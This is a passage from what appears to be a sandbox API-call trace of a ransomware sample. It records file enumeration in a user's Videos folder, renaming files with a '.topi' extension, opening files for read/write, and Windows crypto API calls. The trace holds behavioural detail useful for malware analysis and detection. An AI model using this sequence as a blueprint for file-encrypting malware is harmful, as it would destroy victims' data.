(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\Ya_jFoXRTk6bq.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\ljbw4xnuu9yf6r\\ya_jfoxrtk6bq.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\Ya_jFoXRTk6bq.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\ljbw4xnuu9yf6r\\ya_jfoxrtk6bq.swf.topi")) returned 1 [0097.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.793] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.793] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.794] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbb20e2d0, ftCreationTime.dwHighDateTime=0x1d5bab1, ftLastAccessTime.dwLowDateTime=0x48ca7900, ftLastAccessTime.dwHighDateTime=0x1d5c40f, ftLastWriteTime.dwLowDateTime=0x48ca7900, ftLastWriteTime.dwHighDateTime=0x1d5c40f, nFileSizeHigh=0x0, nFileSizeLow=0xcbe6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ya_jFoXRTk6bq.swf", cAlternateFileName="YA_JFO~1.SWF")) returned 0 [0097.794] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.794] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0097.794] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.795] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.796] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.797] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\") returned="k87M_\\" [0097.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\") returned="z4k8sZRNNGS3Ve7W-\\" [0097.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0097.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0097.800] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.800] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.800] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.800] PathFindFileNameW (pszPath="") returned="" [0097.800] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\2zz49h7Y1j.avi") returned=".avi" [0097.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\k87M_\\2zz49h7Y1j.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\k87m_\\2zz49h7y1j.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.801] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=100657) returned 1 [0097.801] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.804] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1890b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.804] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.806] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.807] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.807] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.807] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.807] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.807] GetLastError () returned 0x0 [0097.807] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.807] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.807] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.807] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.807] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.807] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.807] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18930) returned 0x9a06a00 [0097.808] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.808] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb9b0 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb9f8 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.808] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fd0 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fe8 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.809] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 